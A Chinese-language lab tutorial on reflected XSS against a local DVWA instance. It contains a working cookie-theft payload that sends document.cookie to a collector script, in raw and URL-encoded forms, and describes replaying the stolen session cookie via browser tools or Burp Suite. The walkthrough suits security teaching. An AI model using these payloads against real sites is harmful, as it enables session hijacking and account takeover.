一、准備
首先呢,需要先有一個dvwa的靶場,我這里是在本地搭建了一個,先訪問127.0.0.1,正常用戶名密碼登錄
這里就以low級別進行操作
二、獲取cookie
選擇反射型xss題目,先使用彈窗測試一下<script>alert(123)</script>
確定可以使用代碼之后,在搭建的服務器目錄下創建一個cookie.php,我這里是C:\wamp\www(僅供參考)
目的是為了將獲取到的cookie,保存到cookie.php所在目錄下自動生成一個cookie.txt
接下來需要根據題目構造js語句
<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script> #語句是跳轉執行訪問指定的文件, 並在url中顯示cookie
使用js語句獲取cookie的兩種方式:
第一種方式:url欄輸入,進行url編碼
原始URL: http://location/dvwa/vulnerabilities/xss_r/?name= <script>doument.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script> 需要進行URL編碼: http://localhost/dvwa/vulnerabilities/xss_r/?name= %3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E#
第二種方式是在xss注入處直接些參數
<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
提交,成功的話會跳轉到另一個界面
現在我先查看一下文件目錄,可以看到是已經成功創建了一個名為cookie.txt的文本
另外能夠看到瀏覽器url框內有一個cookie的值
三、攻擊者利用獲取到的cookie登錄到受害者的賬戶
第一種方式:修改瀏覽器記錄的cookie
獲取到cookie后打開另外一個瀏覽器訪問dvwa(此瀏覽器用別的賬號登陸過DVWA,所以瀏覽器有對應的cookie格式)(因為本地搭建原因,除非重新打開瀏覽器,否則cookie不能正常刷新,所以直接打開另一個瀏覽器方便一些),f12打開開發者工具,找到cookie值。
修改cookie為獲取的cookie 並將security 設為low ,然后輸入目標用戶的ID和密碼登陸目標用戶,
第二種方式:使用burpsuite 抓包,改包,
ok,已經成功利用獲取到的cookie進行登錄